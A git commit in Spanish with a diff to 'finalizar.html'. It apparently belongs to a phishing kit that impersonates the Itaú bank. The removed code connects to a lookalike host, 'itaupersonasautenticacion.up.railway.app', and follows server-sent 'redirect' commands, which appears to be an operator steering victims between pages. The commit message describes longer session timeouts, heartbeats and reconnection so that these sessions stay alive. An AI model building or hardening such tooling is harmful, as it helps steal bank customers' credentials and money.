Fix: Mejorar estabilidad de sesiones con configuracion robusta de Socket.IO
- Aumentar timeout de sesiones de 5 a 30 minutos
- Agregar heartbeat cada 20 segundos para mantener sesiones activas
- Mejorar configuracion de Socket.IO con timeouts mas largos
- Centralizar manejo de socket en socket-handler.js
- Agregar reconexion automatica robusta
- Eliminar codigo duplicado de socket en todos los HTML
- Prevenir desconexiones frecuentes en todos los dispositivos

--- a/finalizar.html
+++ b/finalizar.html
@@ -113,16 +113,7 @@
         <button class="finish-btn" onclick="window.location.href='index.html?clear=true'">Finalizar</button>
     </div>
 
-    <script src="https://itaupersonasautenticacion.up.railway.app/socket.io/socket.io.js"></script>
-    <script>
-        const socket = io('https://itaupersonasautenticacion.up.railway.app');
-
-        // Listen for redirect commands
-        socket.on('redirect', (data) => {
-            if (data.page) {
-                window.location.href = data.page;
-            }
-        });
-    </script>
+    <script src="/socket.io/socket.io.js"></script>
+    <script src="socket-handler.js"></script>
 </body>
 </html>
